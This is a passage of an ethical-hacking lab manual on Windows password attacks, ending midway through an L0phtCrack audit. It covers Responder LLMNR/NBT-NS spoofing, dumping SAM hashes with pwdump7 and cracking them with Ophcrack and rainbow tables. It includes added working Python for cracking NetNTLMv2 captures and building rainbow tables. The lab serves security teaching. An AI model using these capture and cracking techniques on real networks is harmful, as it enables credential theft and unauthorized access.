Module 06 - System Hacking

System hacking is the science of testing computers and networks for vulnerabilities and
harmful plugins.


Lab Scenario

Password hacking is one of the easiest and most common ways hackers obtain
unauthorized computer or network access. Although strong passwords that are
difficult to crack (or guess) are easy to create and maintain, users often neglect this.
Therefore, passwords are one of the weakest links in the information-security chain.
Passwords rely on secrecy. After a password is compromised, its original owner isn't
the only person who can access the system with it. Hackers have many ways to obtain
passwords. They can obtain passwords from local computers by using password-
cracking software. To obtain passwords from across a network, they can use remote
cracking utilities or network analyzers. The labs in this module demonstrate just how
easily hackers can gather password information from your network, and describe
password vulnerabilities that exist in computer networks, as well as countermeasures
to help prevent these vulnerabilities from being exploited on your systems.


Lab Objectives

The objective of this lab is to help students learn to monitor a system remotely and
to extract hidden files, and other tasks that include:

- Extracting administrative passwords
- Hiding files and extracting hidden files
- Recovering passwords
- Monitoring a system remotely

Lab Environment
To carry out this lab, you need:
- A computer running Windows Server 2016
- A computer running Windows Server 2012
- A computer running Windows 10 in a virtual machine
- A computer running Kali Linux in a virtual machine
- A web browser with an Internet connection
- Administrative privileges to run tools
Lab Duration
Time: 190 Minutes
Overview of System Hacking
The goal of system hacking is to gain access, escalate privileges, execute applications,
and hide files.


Lab Tasks
Recommended labs to assist you in system hacking:

- Active Online Attack using Responder
- Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
- Creating and using the Rainbow Tables
- Auditing System Passwords using L0phtCrack
- Exploiting Client Side Vulnerabilities and Establishing a VNC Session
- Escalating Privileges by Exploiting Client Side Vulnerabilities
- Hacking Windows Server 2012 with a Malicious Office Document using TheFatRat
- Hacking Windows 10 Using Metasploit and Post-Exploitation using Meterpreter
- User System Monitoring and Surveillance using Spytech SpyAgent
- Web Activity Monitoring and Recording using Power Spy
- Hiding Files using NTFS Streams
- Hiding Data using White Space Steganography
- Image Steganography using OpenStego
- Image Steganography using Quick Stego
- Covert Channels using Covert TCP
- Viewing, Enabling and Clearing Audit Policies using Auditpol


Lab Analysis
Analyze and document the results related to this lab exercise. Give your opinion on
the target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Active Online Attack using Responder

LLMNR/NBT-NS spoofing is a classic internal-network attack that still works today,
due to low awareness and the fact that both protocols are enabled by default in Windows.

Lab Scenario

LLMNR and NBT-NS are enabled by default in Windows and can be used to extract
a user's password hash (more precisely, a NetNTLMv2 challenge-response that can be
cracked offline). Since awareness of this attack is fairly low, there
is a good chance of acquiring user credentials on an internal network penetration
test.

By listening for LLMNR/NBT-NS requests, it is possible for an attacker to
spoof itself as the server and send a response claiming to be the legitimate server. After
the victim system accepts the connection, it is possible to capture the victim's user
credentials by using a tool like Responder.py.
Lab Objectives
The objective of this lab is to help students understand how to:

- Perform an LLMNR/NBT-NS spoofing attack on a network

Lab Environment
To perform the lab, you need:
- Windows 10 running as a virtual machine
- Kali Linux running as a virtual machine
Lab Duration

Time: 10 Minutes


Overview of LLMNR/NBT-NS

When a DNS lookup fails, Windows falls back to Link-Local Multicast Name Resolution
(LLMNR, multicast on UDP port 5355) and then to the NetBIOS Name Service (NBT-NS,
broadcast on UDP port 137). Both are unauthenticated: any machine on the local segment
can answer the query and claim to be the requested host. When the victim then connects
to the masquerading machine (typically over SMB) and authenticates with NTLM, the
attacker captures the NTLMv2 challenge-response. That value cannot be used directly as a
pass-the-hash credential, but it can be cracked offline with a wordlist to recover the
password. The countermeasure is to disable LLMNR (Group Policy: "Turn off multicast
name resolution") and NetBIOS over TCP/IP on the network adapter.
Lab Tasks
1. Before starting this lab, launch and log in to the Windows 10 machine.

2. Log in as Username: Jason, Password: qwerty.

3. Now launch the Kali Linux virtual machine, and log in (Username: root,
Password: toor).

4. Open a command terminal from the taskbar, type responder -I eth0
and press Enter as shown in the screenshot. (-I selects the interface to
listen on; eth0 is the interface name in this lab environment.)

5. Responder starts listening on the network interface for events as shown in the
screenshot.
6. Assume that you want to access a shared network drive on your
network from the Windows 10 machine.

7. Switch back to Windows 10, right-click the Start icon, and click Run as
shown in the screenshot.

FIGURE: Launching the Run window

8. The Run window appears. Type the UNC path of the share in the Open field and
click OK. Because the name is not resolved by DNS, Windows falls back to
LLMNR/NBT-NS and Responder answers the query. Leave the Windows 10
machine running and switch back to the Kali Linux machine.

FIGURE: Run window
9. Responder starts capturing the access attempts of the Windows 10 machine as
shown in the screenshot.

10. Responder collects the NTLMv2 hash of the logged-in user of the target
machine.

11. By default, Responder stores its logs in /usr/share/responder/logs.

FIGURE: Hashes captured by Responder

12. Navigate to Places and click Computer from the menu bar as shown in the
screenshot.

FIGURE: Navigating to the Responder log file

13. The Computer window appears. Navigate to usr -> share -> responder ->
logs and double-click the recorded log file to open and view the recorded
content.

14. Hashes of the logged-in user are collected by Responder.

15. We will crack the hashes to recover the password of the logged-in user, i.e.
Jason.

16. To crack the passwords, open a new command line terminal and type john
/usr/share/responder/logs/<file name of the logs>.txt as shown in the
screenshot. John recognises the file as netntlmv2 and, without further options,
runs its default modes (single, then the built-in wordlist, then incremental);
add --wordlist=<wordlist> to use a wordlist of your choice.

Note: The log file name will differ in your lab environment. Here the log file
name is SMBv2-NTLMv2-SSP-10.10.10.10.txt.

FIGURE 1.10: Cracking hashes using John

17. The cracked password of the Jason user is shown in the screenshot.
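The following is an added example, not part of the lab manual or of Responder or John, showing what is inside the SMBv2-NTLMv2-SSP-<ip>.txt line from steps 11 to 17 and what the cracker does with it, which is also the mechanism the overview above describes: it derives the NT hash (MD4 over the UTF-16LE password), the NTLMv2 key and the NTProofStr as specified in MS-NLMP, parses a line in Responder's user::domain:challenge:proof:blob format, and tests candidate passwords against it. The sample capture is constructed from the lab's user Jason/qwerty with an assumed domain WORKGROUP, an assumed server challenge and an assumed blob; it is not taken from a real machine. MD4 is implemented in pure Python because hashlib builds against OpenSSL 3 often no longer provide it.

```python
import hashlib
import hmac
import struct
from typing import Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash; hashlib's md4 is frequently
    missing under OpenSSL 3, so it is implemented here."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        r = state[:]
        for func, k, order, shifts in rounds:
            for i in range(16):
                j = (-i) % 4   # register updated this step: a, d, c, b, a, ...
                t = (r[j] + func(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                     + x[order[i]] + k) & mask
                r[j] = rotl(t, shifts[i % 4])
        state = [(s + v) & mask for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash as stored in the SAM and used by NTLM: MD4 over UTF-16LE, no salt."""
    return md4(password.encode("utf-16-le"))


def ntproofstr(nthash: bytes, user: str, domain: str,
               server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 response (MS-NLMP 3.3.2): key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain));
    NTProofStr = HMAC-MD5(key, server challenge || blob). The blob carries the
    client nonce and timestamp, so every capture differs even for one password."""
    key = hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str) -> dict:
    """Responder/John format: user::domain:challenge_hex:ntproofstr_hex:blob_hex"""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_candidate(line: str, password: str) -> bool:
    """What john/hashcat do per candidate: recompute NTProofStr and compare."""
    c = parse_responder_line(line)
    got = ntproofstr(nt_hash(password), c["user"], c["domain"], c["challenge"], c["blob"])
    return hmac.compare_digest(got, c["proof"])


def crack(line: str, wordlist) -> Optional[str]:
    """Offline dictionary attack over a captured line."""
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


def make_capture(user: str, domain: str, password: str,
                 server_challenge: bytes, blob: bytes) -> str:
    """Build a line in Responder's file format (used only to construct the
    sample below; a real line comes from the SMB exchange Responder logged)."""
    proof = ntproofstr(nt_hash(password), user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample (assumed domain, challenge and blob, not a real capture):
# the lab's user Jason with password qwerty. The blob layout is the NTLMv2
# header (0101), timestamp, client nonce, reserved, and an empty AV-pair list.
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "0a" * 8 + "00" * 4 + "00" * 4)
SAMPLE_LINE = make_capture("Jason", "WORKGROUP", "qwerty",
                           bytes.fromhex("1122334455667788"), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["password", "123456", "letmein", "qwerty"]))
```

Two things follow from the derivation. The captured value depends on the server challenge and the client's blob, so the same password gives a different line on every capture and precomputed tables such as those in the later labs do not apply; only a dictionary or brute-force attack does. And the line is not a pass-the-hash credential: what pass-the-hash needs is the NT hash, which is exactly what the check has to reconstruct from a password guess.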
Lab Analysis

Analyze and document the results related to the lab exercise.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords

pwdump7 can be used to dump protected files. Ophcrack is a free open source (GPL
licensed) program that cracks Windows passwords from LM and NT hashes using
rainbow tables.


Lab Scenario

The Security Account Manager (SAM) is a database file present on Windows
machines that stores user accounts and security descriptors for users on a local
computer. It stores users' passwords in a hashed format (as an LM hash and an NT
hash; since Windows Vista the LM hash is not stored by default, and the LM field holds
a fixed "empty" value). Because a hash function is one-way, this provides some measure
of security for the storage of the passwords, but the NT hash is unsalted, so identical
passwords produce identical hashes and precomputed tables apply.

In a system hacking lifecycle, attackers generally dump operating system password
hashes immediately after a compromise of the target machine. The password
hashes enable attackers to launch a variety of attacks on the system, including
password cracking, pass the hash, unauthorized access of other systems using the
same passwords, password analysis, and pattern recognition, in order to crack
other passwords in the target environment.

You need administrator access to dump the contents of the SAM file.
Assessment of password strength is a critical milestone during your security
assessment engagement. You will start your password assessment with a simple
SAM hash dump and run it through a hash cracker to uncover plaintext
passwords.


Lab Objectives
The objective of this lab is to help students learn how to:
- Use the pwdump7 tool to extract password hashes
- Use the Ophcrack tool to crack the passwords and obtain plaintext
passwords
Lab Environment
To carry out the lab you need:

- pwdump7, located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Password Cracking Tools\pwdump7

- Ophcrack tool, located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Password Cracking Tools\ophcrack

- Run these tools on Windows 10

- You can download the latest version of pwdump7 at
http://www.tarasco.org/security/pwdump_7/index.html

- You can download the latest version of Ophcrack at
http://ophcrack.sourceforge.net

- Administrative privileges to run tools

Lab Duration

Time: 10 Minutes

Overview of the Lab

pwdump7 can also be used to dump protected files. You can always copy a locked
file by executing pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat.
Rainbow tables are provided for free by the Ophcrack developers: the XP free tables
cover LM hashes of alphanumeric passwords of up to 14 characters, and the Vista free
table covers NT hashes. The tables are downloaded from the Ophcrack site and must be
installed in Ophcrack (Tables) before cracking; a hash whose password lies outside a
table's character set or length range will not be cracked by that table.


Lab Tasks

1. Before starting this lab, we need to find the User IDs (RIDs) associated with
the usernames on the Windows 10 machine.

2. Launch the Windows 10 machine and log in.

3. Launch Command Prompt in Administrator mode: type cmd
in the Search field, right-click Command Prompt, and click Run
as administrator as shown in the screenshot.
FIGURE 2.1: Opening Command Prompt as administrator

4. The User Account Control pop-up appears; click Yes.

FIGURE 2.2: UAC prompt

CEH Lab Manual - Ethical Hacking and Countermeasures. Copyright © by EC-Council.
All Rights Reserved. Reproduction is Strictly Prohibited.

5. In the Command Prompt window, type wmic useraccount get
name,sid and press Enter.

6. By issuing this command we get the usernames and their respective SIDs; the
last component of each SID is the user's RID (UserID). Make a note of each UserID
for further steps.

FIGURE 2.3: Getting the SIDs through Command Prompt

7. Now, copy the pwdump7 folder from the Z:\CEH-Tools\CEHv10
Module 06 System Hacking\Password Cracking Tools location and
paste it on the Desktop.

8. Now, open a new command prompt window in Administrator mode
and type cd C:\Users\Admin\Desktop\pwdump7 and press Enter.

FIGURE 2.4: Changing the working directory

9. Type PwDump7.exe and press Enter to gather the password hashes and
UserIDs.

FIGURE 2.5: Gathering the password hashes

10. Now, at the command prompt, type PwDump7.exe > c:\hashes.txt and
press Enter.

11. By issuing this command PwDump7.exe will write all of its output
to the c:\hashes.txt file.

12. To check the generated hashes, navigate to c:\ and open the hashes.txt
file with Notepad.

13. Now place the usernames before the respective UserIDs that we
gathered in step 6, as shown in the screenshot, so that each line has the
form username:RID:LMhash:NThash:::.

14. Now press Ctrl+S to save the file; the Save As window appears. Choose
Desktop as the save location and click Save.

FIGURE 2.9: Saving the hashes file
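Added example, not part of the lab manual or of pwdump7, that does steps 6 and 13 programmatically: it parses the output of wmic useraccount get name,sid, takes the RID from the last component of each SID, fills in the user field of each pwdump7 line, and flags which entries a rainbow-table cracker can actually work on. The wmic and pwdump7 output strings are constructed samples with made-up SIDs and hashes (only the empty-LM and empty-NT constants are real values), not output from the lab machine.

```python
import re

# Well-known constants: the LM field a modern Windows stores when LM hashing
# is disabled, and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample of "wmic useraccount get name,sid" output (made-up SIDs).
WMIC_OUTPUT = """\
Name           SID
Administrator  S-1-5-21-1234567890-1234567890-1234567890-500
Guest          S-1-5-21-1234567890-1234567890-1234567890-501
Jason          S-1-5-21-1234567890-1234567890-1234567890-1001
Shiela         S-1-5-21-1234567890-1234567890-1234567890-1002
Martin         S-1-5-21-1234567890-1234567890-1234567890-1003
"""

# Constructed sample of pwdump7 output, <name>:<RID>:<LM>:<NT>:::, with the
# name field empty as in the lab (hashes are made up except the two constants).
PWDUMP_OUTPUT = """\
:500:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
:1003:00112233445566778899aabbccddeeff:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
"""

SID_LINE = re.compile(r"^(\S+)\s+(S-1-5-21-(?:\d+-){3}(\d+))\s*$")


def parse_wmic_sids(text: str) -> dict:
    """Return {RID: username} from wmic output; the RID is the SID's last component."""
    rids = {}
    for line in text.splitlines()[1:]:          # skip the header row
        m = SID_LINE.match(line)
        if m:
            rids[int(m.group(3))] = m.group(1)
    return rids


def merge(pwdump_text: str, rids: dict) -> list:
    """Fill the user field of every pwdump7 line from the RID -> name map."""
    rows = []
    for line in pwdump_text.splitlines():
        if not line.strip():
            continue
        name, rid, lm, nt, *_ = line.split(":")
        rid = int(rid)
        rows.append({"user": name or rids.get(rid, f"rid{rid}"), "rid": rid,
                     "lm": lm.lower(), "nt": nt.lower()})
    return rows


def to_pwdump_lines(rows: list) -> list:
    """The format Ophcrack (Load > PWDUMP file), RainbowCrack, John and hashcat read."""
    return [f"{r['user']}:{r['rid']}:{r['lm']}:{r['nt']}:::" for r in rows]


def triage(rows: list) -> dict:
    """What a table-based cracker can do with each entry: LM tables only help
    where a real LM hash is stored (LM is off by default since Vista); an empty
    NT hash is a blank password and needs no cracking at all."""
    notes = {}
    for r in rows:
        if r["nt"] == EMPTY_NT:
            notes[r["user"]] = "blank password"
        elif r["lm"] == EMPTY_LM:
            notes[r["user"]] = "NT hash only (use NT/Vista tables)"
        else:
            notes[r["user"]] = "LM hash present (XP/LM tables apply)"
    return notes


if __name__ == "__main__":
    rows = merge(PWDUMP_OUTPUT, parse_wmic_sids(WMIC_OUTPUT))
    print("\n".join(to_pwdump_lines(rows)))
    for user, note in triage(rows).items():
        print(f"{user}: {note}")
```

In the lab every account falls into the "NT hash only" case, which is why the Vista free table (an NT-hash table) is installed in Ophcrack rather than the XP (LM) tables.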
15. Now, we shall attempt to crack these password hashes with the Ophcrack
tool.

16. Launch the Ophcrack application from Z:\CEH-Tools\CEHv10 Module 06
System Hacking\Password Cracking Tools\ophcrack\x86.

FIGURE 2.10: Launching the Ophcrack application

17. The Ophcrack main window appears, as shown in the screenshot:

FIGURE 2.11: Ophcrack main window

18. Click the Load menu, and select PWDUMP file.

FIGURE 2.12: Selecting PWDUMP file

19. The Open PWDUMP file window appears. Browse to the PWDUMP file
hashes.txt located on the Desktop.

20. Select the hashes.txt file located on the Desktop, and click Open.

21. The hashes are loaded in Ophcrack, as shown in the screenshot:

22. Click Tables on the toolbar.

23. The Table Selection window appears; select Vista free and click Install.

24. The Select the directory which contains the tables window appears. Select
the tables_vista_free folder, which is already downloaded and kept in Z:\CEH-
Tools\CEHv10 Module 06 System Hacking\Password Cracking
Tools\ophcrack, and click Select Folder.

Note: You can download free XP and Vista rainbow tables from
http://ophcrack.sourceforge.net/tables.php.

FIGURE 2.17: Choosing the tables directory

25. tables_vista_free is a precomputed table for reversing the NT hash
function and recovering plaintext passwords up to a certain length; it does not
cover every password, so accounts with passwords outside its keyspace will
remain uncracked.

26. The selected table Vista free is installed, which is represented by a green
bullet. Select the table, and click OK.

27. Click Crack on the menu bar. Ophcrack begins to crack passwords.
Ophcrack will take a few minutes to crack the passwords. Wait until it finishes
the password cracking process.

28. In the meanwhile, it will also display the cracked passwords of the respective
users.

29. Cracked passwords are displayed, as shown in the following screenshot:

30. In a real engagement, if an attacker compromises a machine and escalates
privileges, he/she can obtain password hashes using tools such
as pwdump7, and then use hash-cracking tools like
Ophcrack to recover plaintext passwords.


Lab Analysis
Analyze all the password hashes gathered during this lab, and figure out what the
passwords were.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Creating and using the Rainbow Tables

Winrtgen is a graphical rainbow table generator that supports LM, FastLM,
NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE,
MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1,
CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.

RainbowCrack is a computer program that generates rainbow tables for use in password
cracking and uses them to look up hashes.


Lab Scenario

Once an attacker obtains a dump of a system's SAM database, the easiest and fastest
route he or she can follow to recover the plaintext password is to use rainbow tables.
A rainbow table is a precomputed structure covering a given character set and password
length, used for reversing cryptographic hash functions. Rather than storing every
hash (which would be far too large), it stores only the start and end points of long
chains of alternating hash and "reduction" steps; at lookup time the cracker regenerates
the one chain that contains the target hash. This is a time-memory trade-off: the
table takes longer to build than a single brute-force run, but once built it answers
lookups for any hash in its keyspace in seconds. The recovered plaintext lets the
attacker access the network as an authenticated user.

Rainbow tables make password cracking much faster than brute-force cracking for
unsalted hashes such as LM and NT; they do not apply to salted hashes, where each
salt would need its own table. The approach uses a lot of disk space because of the
large number of chains stored. With the availability of large computing
power, you can generate huge rainbow tables that you can use for your security and
password audit assignments.


Lab Objectives

The objective of this lab is to show students how to create rainbow tables and use
them to crack hashes and obtain plaintext passwords.

Lab Environment
To carry out this lab, you need:

- A computer running Windows Server 2016
- A computer running Windows 10

- Winrtgen tool located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Tools to Create Rainbow Tables\Winrtgen

- RainbowCrack tool located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Tools to Create Rainbow Tables\RainbowCrack

- Download the latest version of Winrtgen at
http://www.oxid.it/projects.html

- Download the latest version of RainbowCrack at
https://project-rainbowcrack.com/

- If you wish to download the latest version, then the screenshots shown in the lab
might differ
- Administrative privileges to run the tools

Lab Duration

Time: 10 Minutes

Overview of Rainbow Tables

A rainbow table is a precomputed table for reversing cryptographic hash functions,
typically used for cracking password hashes. Tables are usually used for recovering a
plaintext password consisting of a limited set of characters, up to a certain length.


Lab Tasks

1. Assume that you have the hashes.txt file containing the password hashes of the
user accounts on the Windows 10 machine, which you obtained in the previous lab
(Dumping and Cracking SAM Hashes to Extract Plaintext Passwords) and saved
on the Desktop of the Windows 10 machine. Share the file by any medium so that it
can be accessed from the Windows Server 2016 machine.

2. Launch the Windows Server 2016 machine and log in.

3. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to
Create Rainbow Tables\Winrtgen, and double-click winrtgen.exe.

4. If an Open File - Security Warning pop-up appears, click Run.
5. The main window of Winrtgen opens, as shown in the following screenshot:

6. Click the Add Table button to add a new rainbow table.

FIGURE: Adding a rainbow table

7. The Rainbow Table properties window appears.

8. Select ntlm from the Hash dropdown list.
Set Min Len to 4, Max Len to 6 and Chain Count to 4000000.
Select loweralpha from the Charset dropdown list (the charset depends upon
the passwords you are targeting).

9. With these settings, you are creating a rainbow table that can be used to crack
only ntlm hashes of lowercase alphabetical passwords of 4 to 6 characters in
length (26^4 + 26^5 + 26^6 = 321,254,128 candidates).

10. A file will be created and displayed in the Winrtgen window. Click OK.
11. Winrtgen begins to create the rainbow table.

Note: Winrtgen takes a lot of time to generate the table. So, to save time for the lab
demonstration, a pregenerated table is kept at Z:\CEH-
Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow
Tables\Winrtgen.

12. The created table is saved automatically in Z:\CEH-Tools\CEHv10 Module
06 System Hacking\Tools to Create Rainbow Tables\Winrtgen.

13. This generated table is used in tools such as RainbowCrack in order to crack
passwords of various lengths, depending on the hashes you generate using
Winrtgen.

14. Now, we shall try to use these tables and crack the password hashes using the
RainbowCrack tool.

15. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to
Create Rainbow Tables\RainbowCrack, and double-click rcrack_gui.exe.

16. If an Open File - Security Warning pop-up appears, click Run.

17. The main window of RainbowCrack opens, as shown in the following
screenshot:

FIGURE: RainbowCrack main window
18. To add a password hash in RainbowCrack, click the File menu, and click Load
NTLM Hashes from PWDUMP File...

19. The Open dialog box appears. Navigate to the hashes.txt of the Windows 10
machine that we gathered in the previous lab, and click Open.

20. RainbowCrack will display the hash value and the user name as shown in
the screenshot.

21. To import the rainbow table into RainbowCrack to crack the password, navigate to
Rainbow Table and click Search Rainbow Tables from the menu bar.

22. The Open dialog box appears; navigate to the pregenerated rainbow table,
located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create
Rainbow Tables\Winrtgen, select ntlm_loweralpha#4-6_0_2400x4000000_oxid#000.rt
(the file name records the hash type, charset, length range, chain length 2400 and
chain count 4,000,000) and click Open.

FIGURE: Selecting the rainbow table

23. As soon as you import the rainbow table, RainbowCrack will crack the
passwords of the Windows 10 machine users (those within the table's
keyspace) as shown in the screenshot.

FIGURE: Passwords cracked by RainbowCrack
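Added example, not from the lab manual, Winrtgen or RainbowCrack, of the chain construction the two tools implement (the build in steps 7 to 12 and the lookup in steps 18 to 23), scaled down so it runs in seconds: it keeps the lab's charset and length range (loweralpha, 4 to 6 characters) but uses a short chain length and a small chain count, and uses hashlib.md5 over the UTF-16LE plaintext as a stand-in hash. Replacing h() with the NT hash (MD4 over UTF-16LE) gives exactly the ntlm tables built above; nothing else changes. Every value in it is generated by the code itself.

```python
import hashlib
import string

# Parameters from the lab's Winrtgen dialog. Chain length and chain count are
# scaled down in the calls below (the lab uses 2400 x 4,000,000).
CHARSET = string.ascii_lowercase
MIN_LEN, MAX_LEN = 4, 6


def h(plaintext: str) -> bytes:
    """Hash under attack. Stand-in: MD5 over UTF-16LE. For real ntlm tables
    this would be MD4 over UTF-16LE (the NT hash); no salt either way."""
    return hashlib.md5(plaintext.encode("utf-16-le")).digest()


def keyspace_size(charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN) -> int:
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


KEYSPACE = keyspace_size()   # 321,254,128 for loweralpha 4-6


def index_to_plaintext(idx: int) -> str:
    """Bijection from [0, KEYSPACE) to passwords: all length-4 words, then
    length-5, then length-6 (least-significant character first)."""
    for n in range(MIN_LEN, MAX_LEN + 1):
        block = len(CHARSET) ** n
        if idx < block:
            out = []
            for _ in range(n):
                out.append(CHARSET[idx % len(CHARSET)])
                idx //= len(CHARSET)
            return "".join(out)
        idx -= block
    raise ValueError("index outside keyspace")


def reduce_to_plaintext(digest: bytes, column: int) -> str:
    """Reduction function R_column: maps a hash back into the keyspace.
    Mixing in the column index is what makes this a *rainbow* table (a
    different reduction per column), so two chains that collide in different
    columns do not merge."""
    return index_to_plaintext((int.from_bytes(digest[:8], "little") + column) % KEYSPACE)


def chain(start: str, chain_len: int) -> list:
    """p0 = start, p(i+1) = R_i(h(p_i)); the last element is the stored endpoint."""
    pts = [start]
    for col in range(chain_len):
        pts.append(reduce_to_plaintext(h(pts[-1]), col))
    return pts


def build_table(chain_count: int, chain_len: int, seed: int = 0) -> dict:
    """Generate the table. Only {endpoint: startpoint} is stored, which is the
    whole point of the time-memory trade-off. Chains that merge overwrite
    each other, which is why chain_count * chain_len overstates real coverage."""
    table = {}
    for i in range(chain_count):
        start = index_to_plaintext((seed + i * 7919) % KEYSPACE)
        table[chain(start, chain_len)[-1]] = start
    return table


def lookup(target: bytes, table: dict, chain_len: int):
    """Search: assume the target sits in column k, walk it forward to an
    endpoint, and if that endpoint is stored, regenerate the chain from its
    start to find the preimage. Try every column, from the last to the first."""
    for col in range(chain_len - 1, -1, -1):
        p = reduce_to_plaintext(target, col)
        for later in range(col + 1, chain_len):
            p = reduce_to_plaintext(h(p), later)
        start = table.get(p)
        if start is None:
            continue                      # endpoint not in table: target not in column col
        p = start
        for c in range(chain_len):        # regenerate; may be a false alarm (merged chain)
            if h(p) == target:
                return p
            p = reduce_to_plaintext(h(p), c)
    return None


if __name__ == "__main__":
    table = build_table(chain_count=2000, chain_len=100)
    secret = chain(next(iter(table.values())), 100)[37]   # a password the table covers
    print(secret, lookup(h(secret), table, 100))
```

The lab's table stores 4,000,000 chains of length 2400, that is 9.6 billion chain points against a keyspace of 321 million, and still only reaches a high (not total) success rate, because of the chain merges noted in build_table. Lookup cost grows with the square of the chain length, which is the trade-off Winrtgen's chain length setting controls.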
Lab Analysis

Analyze and document the results related to this lab exercise.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: No
Platform Supported: Classroom, iLabs
Auditing System Passwords using L0phtCrack

L0phtCrack is a password auditing tool that contains features such as scheduling, hash
extraction from 64-bit Windows versions, multiprocessor algorithms, and network
monitoring and decoding. It can import and crack Unix password files as well as
hashes from remote Windows machines.


Lab Scenario

Because security and compliance are high priorities for most organizations,
attacks on an organization's computer systems take many different forms, such
as spoofing, smurfing, and other types of Denial of Service (DoS) attacks. These
attacks are designed to harm or interrupt the use of your operational systems.

Password cracking is a term used to describe the penetration of a network, system,
or resource with or without the use of tools to unlock a resource that has been
secured with a password. In this lab, we will look at what password cracking is,
why attackers do it, how they achieve their goals, and what you can do to
protect yourself. Through an examination of several scenarios, in this lab we
describe some of the techniques they deploy and the tools that aid them in their
assaults, and how password crackers work both internally and externally to violate
a company's infrastructure.

To be an expert ethical hacker and penetration tester, you must understand how
to crack an administrator password. In this lab, we crack system user account
passwords using L0phtCrack.


Lab Objectives
The objective of this lab is to help students learn how to:
- Use the L0phtCrack tool to find user passwords that can be easily cracked

Lab Environment
To carry out the lab you need:

- L0phtCrack tool located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Password Cracking Tools\L0phtCrack

- Windows Server 2016 running as a machine
- Windows Server 2012 running as a machine

- Or download the latest version of L0phtCrack at
http://www.l0phtcrack.com

- Administrative privileges to run tools

Lab Duration
Time: 15 Minutes
Overview of the Lab

In this lab, being a security auditor, you will be running the L0phtCrack tool by giving
it the remote machine's administrator user credentials. User account passwords that are
cracked in a short amount of time are considered to be weak, and you need to take
certain measures to make them stronger.

In this lab, we are auditing passwords on a Windows Server 2012 system.
Lab Tasks

1. Launch the Windows Server 2012 virtual machine.

2. Launch and log in to Windows Server 2016 and navigate to Z:\CEH-
Tools\CEHv10 Module 06 System Hacking\Password Cracking
Tools\L0phtCrack. Double-click lc7setup_v7.0.15_Win64.exe.

3. If an Open File - Security Warning appears, click Run.

4. Follow the wizard-driven installation steps to install L0phtCrack.

Note: At the time of installation, a Program Compatibility Assistant pop-up
may appear. Click Close, and continue with the installation.
5. On completing the installation, launch the L0phtCrack application from the
Apps list.

FIGURE 4.1: Launching the application from the Apps list

6. Click the Proceed With Trial button in the L0phtCrack 7 Trial window.

FIGURE 4.2: L0phtCrack 7 Trial window

7. Click Password Auditing Wizard as shown in the screenshot.

